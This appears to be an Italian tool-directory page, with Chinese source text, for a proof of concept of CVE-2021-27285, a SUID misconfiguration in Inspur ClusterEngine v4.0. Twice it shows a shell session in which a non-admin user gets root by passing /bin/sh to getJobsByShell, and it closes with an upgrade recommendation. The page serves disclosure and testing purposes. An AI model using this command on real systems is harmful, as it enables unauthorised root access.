Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-27285 — Exploit proof-of-concept per la configurazione errata di SUID in Inspur ClusterEngine (CVE-2021-27285) che consente agli utenti non amministratori di scalare i privilegi a root tramite il componente getJobsByShell. | Kitploit
Strumenti/GitHubGitHub/fjh1997/cve-2021-27285
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingRed TeamingBinary Exploitation
GitHubfjh1997/cve-2021-27285

CVE-2021-27285

Exploit proof-of-concept per la configurazione errata di SUID in Inspur ClusterEngine (CVE-2021-27285) che consente agli utenti non amministratori di scalare i privilegi a root tramite il componente getJobsByShell.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-27285

浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题,导致非管理员用户可以通过部分组件进行提权获得root权限。

浪潮clusterenginev4.0存在组件“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题,非管理员用户能通过suid提权方式获得root权限。

提权过程如下:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

修复建议: 升级相关组件

La piattaforma di gestione cluster Inspur ClusterEngine è un software di job management progettato specificamente per i prodotti HPC della serie Inspur TianSuo. Una configurazione errata delle impostazioni SUID di Inspur ClusterEngine consente agli utenti non amministrativi di escalare i privilegi e ottenere accesso root attraverso alcuni componenti.

Inspur ClusterEngine v4.0 presenta un problema di configurazione SUID non corretta con il componente "/opt/tsce4/torque6/bin/getJobsByShell", consentendo agli utenti non amministrativi di escalare i privilegi e ottenere accesso root tramite il meccanismo SUID.

Il processo di escalation dei privilegi è il seguente:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

Raccomandazione: aggiornare i componenti pertinenti.

Scarica lo strumento